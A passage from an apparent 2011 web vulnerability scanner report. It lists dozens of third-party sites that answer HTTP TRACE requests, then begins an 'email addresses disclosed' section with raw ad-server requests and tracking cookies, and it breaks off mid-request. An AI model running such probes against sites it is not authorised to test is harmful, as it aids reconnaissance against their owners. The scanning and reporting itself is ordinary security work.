Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tutorialized.com
Cookie: 9567254be14ea435

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tutorialized.com
Cookie: 9567254be14ea435


26.287. http://www.tvgrapevine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvgrapevine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tvgrapevine.com
Cookie: c6187fb56e03fed2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:12:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tvgrapevine.com
Cookie: c6187fb56e03fed2


26.288. http://www.tvmovie.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvmovie.de
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tvmovie.de
Cookie: aa137b8c4d7fcc19

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tvmovie.de
Cookie: aa137b8c4d7fcc19
Connection: Keep-Alive


26.289. http://www.twitter-icons.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitter-icons.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.twitter-icons.net
Cookie: 199634ff3a925da3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:26 GMT
Server: Apache/2.2.15 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.twitter-icons.net
Cookie: 199634ff3a925da3


26.290. http://www.undisciplined-subs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.undisciplined-subs.com
Cookie: 8a7bddc3909ccfdb

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.7e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8a7bddc3909ccfdb
Host: www.undisciplined-subs.com


26.291. http://www.uni.cc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.uni.cc
Cookie: 4f0378bdbd0b2825

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:37 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.uni.cc
Cookie: 4f0378bdbd0b2825


26.292. http://www.unjiloma.info/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unjiloma.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unjiloma.info
Cookie: e6544e48a570a054

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:24:26 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.unjiloma.info
Cookie: e6544e48a570a054


26.293. http://www.unlimitedgamer.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unlimitedgamer.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unlimitedgamer.net
Cookie: fe18fa7897cdc480

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:59 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fe18fa7897cdc480
Host: www.unlimitedgamer.net


26.294. http://www.unscramble.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unscramble.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.unscramble.net
Cookie: 97b5889fe770fe89

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.unscramble.net
Cookie: 97b5889fe770fe89


26.295. http://www.usa4sale.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa4sale.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usa4sale.net
Cookie: b1585db2eb4ff04b

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usa4sale.net
Cookie: b1585db2eb4ff04b


26.296. http://www.usdebtclock.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usdebtclock.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usdebtclock.org
Cookie: 36abeb0ccf828cb5

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usdebtclock.org
Cookie: 36abeb0ccf828cb5


26.297. http://www.usmortgagerelief.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmortgagerelief.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usmortgagerelief.org
Cookie: 5f8084b44d2229d3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 04:46:45 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9 mod_ssl/2.2.11 OpenSSL/0.9.8e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usmortgagerelief.org
Cookie: 5f8084b44d2229d3


26.298. http://www.usovernightcheck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usovernightcheck.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usovernightcheck.com
Cookie: 17f23a7266a94c00

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:15 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.usovernightcheck.com
Cookie: 17f23a7266a94c00


26.299. http://www.villagehatshop.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.villagehatshop.com
Cookie: 66acc6c76621ccfa

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.villagehatshop.com
Cookie: 66acc6c76621ccfa


26.300. http://www.vocal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vocal.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vocal.com
Cookie: dfbe88588e57d7c3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:34 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vocal.com
Cookie: dfbe88588e57d7c3


26.301. http://www.watchfreetvonline.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.watchfreetvonline.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.watchfreetvonline.net
Cookie: 3616f72a0bafa9e6

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.watchfreetvonline.net
Cookie: 3616f72a0bafa9e6


26.302. http://www.web-ppc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.web-ppc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.web-ppc.com
Cookie: be33c264c918185b

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.web-ppc.com
Cookie: be33c264c918185b


26.303. http://www.webme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webme.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webme.com
Cookie: 170d979a289480c7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:23 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webme.com
Cookie: 170d979a289480c7


26.304. http://www.webstore.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webstore.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webstore.com
Cookie: bb2e7162a7c4ad11

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:29 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webstore.com
Cookie: bb2e7162a7c4ad11


26.305. http://www.whiskeyclips.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whiskeyclips.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whiskeyclips.com
Cookie: f2ef7b9bd318976

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f2ef7b9bd318976
Host: www.whiskeyclips.com


26.306. http://www.worldnewstwo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldnewstwo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldnewstwo.com
Cookie: 5eecb79e0d7a879f

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worldnewstwo.com
Cookie: 5eecb79e0d7a879f


26.307. http://www.worldtvpc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldtvpc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldtvpc.com
Cookie: ddde6553f58d6770

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worldtvpc.com
Cookie: ddde6553f58d6770


26.308. http://www.wponew.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wponew.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wponew.com
Cookie: 77ba071d7131fa87

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:19 GMT
Server: Apache/2.2.8 (Unix) PHP/5.1.6 mod_fastcgi/2.4.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wponew.com
Cookie: 77ba071d7131fa87


26.309. http://www.wrestlezone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wrestlezone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wrestlezone.com
Cookie: 7a267cf8f7c3ebe8

Response

HTTP/1.1 200 OK
Server: Apache/2
Content-Type: message/http
Content-Length: 129
Date: Sun, 01 May 2011 23:41:17 GMT
X-Varnish: 202714054
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy2v.sb.lax2

TRACE / HTTP/1.0
Host: www.wrestlezone.com
Cookie: 7a267cf8f7c3ebe8
X-Varnish: 202714054
X-Forwarded-For: 173.193.214.243


26.310. http://www.wwmt.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wwmt.com
Cookie: 20c984071129834d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wwmt.com
Cookie: 20c984071129834d


26.311. http://www.xbox360iso.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xbox360iso.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xbox360iso.com
Cookie: 93e21820c5cd6911

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 07:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xbox360iso.com
Cookie: 93e21820c5cd6911


26.312. http://www.yeahbaby.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeahbaby.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yeahbaby.com
Cookie: 980933f06c086cac

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:02:32 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yeahbaby.com
Cookie: 980933f06c086cac


26.313. http://www.ymlp44.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp44.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ymlp44.com
Cookie: 1525fbde0f321ed2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp44.com
Cookie: 1525fbde0f321ed2


26.314. http://www.yng.me/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yng.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yng.me
Cookie: afbce366cff43ef3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yng.me
Cookie: afbce366cff43ef3


27. Email addresses disclosed
There are 44 instances of this issue:


27.1. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

27.2. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHY3LDoMgEAD%2FZc8cWGit8W9ArZhusDwqQdd%2FL%2B11Mpk5YVcwnPCaa9nilGCA0bl%2BCdLsjIGWbBlZiqRSRMZ3fXrPhhHzIULQR2lSryOxYryLRDNRIzaXjR%2FcWS1GR91au5tveJIf%2BtVAgDXez3H9D%2BG6vg%3D%3D"; vsd=0@1@4dbe0f2f@loadus.exelator.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:00:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AHc1BDoMgEIXhu8yaBQMtNd4GlBbTCRawEnS8e0m33%2F%2BSd8KuYDzh7Vtd81xghCmE4ZWk3RkTBWlZsTlESvqoXQadqQveRVElI%2BOnPWNky4jbIQp5or5yW135wcZpMQUySzO32HmW315ZggBnY%2FR5%2BT%2FCdf0A"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:00:10 GMT
Set-Cookie: vsd=0@2@4dbe102a@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:00:10 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

27.3. http://ads.adbrite.com/adserver/vdi/762701

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

27.4. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
